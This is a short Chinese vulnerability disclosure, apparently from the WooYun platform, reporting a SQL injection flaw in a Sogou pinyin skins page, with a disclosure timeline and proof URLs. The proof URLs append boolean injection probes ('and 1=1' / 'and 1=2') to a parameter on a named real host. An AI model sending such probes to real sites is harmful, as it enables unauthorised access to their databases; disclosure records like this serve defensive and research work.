漏洞详情 披露状态: 2010-08-02: 细节已通知厂商并且等待厂商处理中 2010-08-03: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: 搜狗某频道存在SQL注入漏洞 详细说明: 搜狗某频道存在SQL注入漏洞 漏洞证明: http://pinyin.sogou.com/skins/xl.php?id=35%20and%201=1 http://pinyin.sogou.com/skins/xl.php?id=35%20and%201=2 修复方案: 搜狗某频道存在SQL注入漏洞 版权声明:转载请注明来源 cnbird@乌云